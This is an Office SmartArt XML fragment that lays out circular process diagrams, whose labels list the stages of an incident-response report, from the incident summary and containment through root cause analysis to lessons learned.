    <dgm:cxn modelId="{3CF66560-DC97-4A2C-87E2-D9929B83D335}" type="presOf" srcId="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" destId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{4E219E47-BFBD-488A-B64D-390612DFDCFF}" type="presOf" srcId="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" destId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{72143777-E087-45A1-957E-4EE301B73C4B}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{E94C4210-DA48-401D-BB88-5D75608B5C03}" srcOrd="1" destOrd="0" parTransId="{32ECC09A-81F9-4C15-A316-AC391E871171}" sibTransId="{03B289C9-E23C-4D8C-B6DB-5BAEA106CA8C}"/>
    <dgm:cxn modelId="{6CEBD18D-7692-4969-91FC-9AC95B7C6494}" type="presOf" srcId="{E94C4210-DA48-401D-BB88-5D75608B5C03}" destId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{A9FCBBB9-AFDE-4B49-A7CE-A011B9110FED}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{EB60DAAE-0B9B-4572-AAE1-C269E4A8A307}" srcOrd="2" destOrd="0" parTransId="{B8EB374C-53D3-4F48-BF6C-B7E7E88572CE}" sibTransId="{D63D9C30-F904-49BC-9406-1E7C98D87F2E}"/>
    <dgm:cxn modelId="{9CEC35DE-DABF-4C31-B226-024CC583DDD0}" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{5C927908-660D-4E83-9BCB-D6C8D01C4C6E}" srcOrd="0" destOrd="0" parTransId="{5568404F-614D-44BF-81E6-77C1E19D933C}" sibTransId="{8D900F0E-E83A-4E87-A73A-49F7E86D62E1}"/>
    <dgm:cxn modelId="{D635DDE7-C897-4E97-9543-CC83E8F2469F}" type="presOf" srcId="{54B6988C-FE2E-46D1-91E5-3579F0C7FAFF}" destId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{D307F0A7-872F-467B-A02B-8032BCE91F42}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{921ECB3C-B833-434C-A6B3-52F189022447}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{A35C309E-22D8-4456-9480-DDD63B61C713}" type="presParOf" srcId="{921ECB3C-B833-434C-A6B3-52F189022447}" destId="{91EA656E-07C2-40DF-A7F1-F41090EA001C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{640D8138-BC4D-4274-BC9F-078D5BA5C556}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{8D1CF814-BA1A-406E-93B4-8B06150C918F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{5B60A42C-D9DE-4BC6-B3F9-6172E1ED4954}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{F789A8D7-12A9-4499-AC0B-47999E92C31A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{E51BDEAC-F20C-41C0-BD48-EBC55CDCE1CB}" type="presParOf" srcId="{F789A8D7-12A9-4499-AC0B-47999E92C31A}" destId="{34AA66A3-6964-4238-925E-D6F785D69BEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{E1F19817-13BF-4568-8B59-6D099026E5EF}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{3E6A0C06-2611-4B42-AE6E-0156093BF298}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{892F59A1-5D36-43EC-91D1-841006D32967}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{E3512E39-A082-420E-BC0D-D2E4F9F514D5}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{BF4C4B91-FB68-4B84-8332-921A6BDC3288}" type="presParOf" srcId="{E3512E39-A082-420E-BC0D-D2E4F9F514D5}" destId="{DC51DBE4-5110-4D10-A2D3-FC3E1554470E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#2"/>
    <dgm:cxn modelId="{E1C59C3B-732E-4FA1-A12E-D680E4DF7294}" type="presParOf" srcId="{57EB53E0-B8C8-4669-9614-94EAF42845BB}" destId="{5F8BD294-06DC-4F14-AFAB-0C573EF8AA6C}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrow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6BB94E-DC72-497D-B226-B0FC16054337}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2#3" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}">
      <dgm:prSet phldrT="[Text]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Recover</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>y</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC3DF38D-7865-4542-94D9-84CC753F9CC6}" type="parTrans" cxnId="{506A892B-A4C8-47C8-9ADB-F13ECFB7AC9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{520DE892-FB28-4346-91FB-340DB2EDD0FD}" type="sibTrans" cxnId="{506A892B-A4C8-47C8-9ADB-F13ECFB7AC9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}">
      <dgm:prSet phldrT="[Text]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>5. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Impact</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DDE709C-61C0-4E2F-9175-9BE8B809FE61}" type="parTrans" cxnId="{C6E104DB-0B73-4E3C-820F-9FFB3EEF3590}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AABBA7B7-5A58-4032-8FD7-2682C5DCA123}" type="sibTrans" cxnId="{C6E104DB-0B73-4E3C-820F-9FFB3EEF3590}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}">
      <dgm:prSet phldrT="[Text]" phldr="0" custT="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr vert="horz" wrap="square"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>6. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Root Cause Analysis</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B32084C6-7AA8-4322-82BE-B28FAACCC8C3}" type="parTrans" cxnId="{3F04F7A1-4CBB-4B80-AB32-9801C9C8D0DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{469AF9F5-85B4-4CC4-9BC1-3731BE33FB09}" type="sibTrans" cxnId="{3F04F7A1-4CBB-4B80-AB32-9801C9C8D0DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" type="pres">
      <dgm:prSet presAssocID="{416BB94E-DC72-497D-B226-B0FC16054337}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:chPref val="7"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Accent1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A2944B7-F8B7-4900-8BBD-942FA19DF801}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Accent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" type="pres">
      <dgm:prSet presAssocID="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" presName="Parent1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Accent2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74223A5C-B074-4AB7-8101-B679B264A52B}" type="pres">
      <dgm:prSet presAssocID="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" presName="Parent2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Accent3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Accent" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" type="pres">
      <dgm:prSet presAssocID="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" presName="Parent3" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B46AF712-EBF3-45F0-A73B-3798E81BCAD0}" type="presOf" srcId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" destId="{74223A5C-B074-4AB7-8101-B679B264A52B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{506A892B-A4C8-47C8-9ADB-F13ECFB7AC9B}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" srcOrd="0" destOrd="0" parTransId="{FC3DF38D-7865-4542-94D9-84CC753F9CC6}" sibTransId="{520DE892-FB28-4346-91FB-340DB2EDD0FD}"/>
    <dgm:cxn modelId="{0D41746C-D406-45C4-BBF3-76CD3D333F14}" type="presOf" srcId="{AA843D4D-E810-4566-B1F4-40B373ED5B3F}" destId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{4A49F873-2814-4655-92EB-2372F5125A76}" type="presOf" srcId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" destId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{84FD4574-3EF1-4B83-8636-2A9E14FC0ABB}" type="presOf" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{3F04F7A1-4CBB-4B80-AB32-9801C9C8D0DD}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{98C4C817-C922-455B-9428-B6CCC3FE95F6}" srcOrd="2" destOrd="0" parTransId="{B32084C6-7AA8-4322-82BE-B28FAACCC8C3}" sibTransId="{469AF9F5-85B4-4CC4-9BC1-3731BE33FB09}"/>
    <dgm:cxn modelId="{C6E104DB-0B73-4E3C-820F-9FFB3EEF3590}" srcId="{416BB94E-DC72-497D-B226-B0FC16054337}" destId="{EF181E64-A678-4622-94B5-DAE4CC2C99A0}" srcOrd="1" destOrd="0" parTransId="{1DDE709C-61C0-4E2F-9175-9BE8B809FE61}" sibTransId="{AABBA7B7-5A58-4032-8FD7-2682C5DCA123}"/>
    <dgm:cxn modelId="{A01CC538-ECB7-4DD3-A7F6-A5DC4C7555E2}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{5EE9FC1D-B07F-4EA5-B688-4C9C5744E716}" type="presParOf" srcId="{D2327BE5-75BD-4450-B59F-6AE2986C6580}" destId="{7A2944B7-F8B7-4900-8BBD-942FA19DF801}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{FD97F928-09A0-4B6E-A122-97D45C41B5EF}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{EAD8C68E-E856-4971-A6C9-58836C912B64}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{97807B71-39FF-43EF-9F56-4023723552EF}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{35B30FB0-0B66-40E3-B9C2-F5880B847A09}" type="presParOf" srcId="{64F3429C-5D4C-4FC5-A2D7-8C69A3F12A6C}" destId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{0CE16D08-EFAD-485B-9316-0E0D937BECB5}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{74223A5C-B074-4AB7-8101-B679B264A52B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{DDC00802-3605-4B7F-A879-5A0363BA319C}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{5E64549C-D0B1-46A4-98C5-F28FE6BB86F9}" type="presParOf" srcId="{2788636B-C4FE-4C44-9C48-8B49466F1213}" destId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess#3"/>
    <dgm:cxn modelId="{844D7517-9130-4275-AE34-235259F326AB}" type="presParOf" srcId="{0CC5C2BB-CCAE-42FE-B631-B6BE53EACFD9}" destId="{2E5AB9BA-1325-4B23-876C-6488374DCAE7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrow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4192F-A81A-4DA1-B383-F23B6CC842E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1565265" y="188688"/>
          <a:ext cx="2708819" cy="2709231"/>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B448F7-6BD0-4BB3-B8F7-DB4C19E9CCA4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2164003" y="1166803"/>
          <a:ext cx="1505238" cy="752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sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>1. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Incident Summary</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2164003" y="1166803"/>
        <a:ext cx="1505238" cy="752439"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{07A1B6E6-69FE-41A9-A02D-FC30DA8AA336}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="812900" y="1745342"/>
          <a:ext cx="2708819" cy="270923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0A07A2-4A81-424A-8D01-C5962348923E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1414690" y="2732462"/>
          <a:ext cx="1505238" cy="752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sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>2. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Containment and Eradication</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1414690" y="2732462"/>
        <a:ext cx="1505238" cy="752439"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F72DF72C-7704-45A3-BE16-CF86B9BF89F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1758062" y="3488278"/>
          <a:ext cx="2327295" cy="2328228"/>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2197BD-1972-45F6-BACA-5BBDC619BE5C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2167564" y="4300372"/>
          <a:ext cx="1505238" cy="752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sz="1800" kern="1200"/>
            <a:t>3</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Timeline of Event</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>s</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2167564" y="4300372"/>
        <a:ext cx="1505238" cy="752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A656E-07C2-40DF-A7F1-F41090EA001C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1351596" y="0"/>
          <a:ext cx="2207655" cy="2207991"/>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1CF814-BA1A-406E-93B4-8B06150C918F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1839560" y="797151"/>
          <a:ext cx="1226751" cy="613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sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>7. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Lessons Learned</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1839560" y="797151"/>
        <a:ext cx="1226751" cy="613229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{34AA66A3-6964-4238-925E-D6F785D69BEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="738427" y="1268654"/>
          <a:ext cx="2207655" cy="220799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6A0C06-2611-4B42-AE6E-0156093BF298}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1228879" y="2073145"/>
          <a:ext cx="1226751" cy="613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sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>8. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Summary Report</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1228879" y="2073145"/>
        <a:ext cx="1226751" cy="613229"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC51DBE4-5110-4D10-A2D3-FC3E1554470E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1508723" y="2689126"/>
          <a:ext cx="1896718" cy="1897478"/>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BD294-06DC-4F14-AFAB-0C573EF8AA6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1842462" y="3350973"/>
          <a:ext cx="1226751" cy="613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en-US" sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>9. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
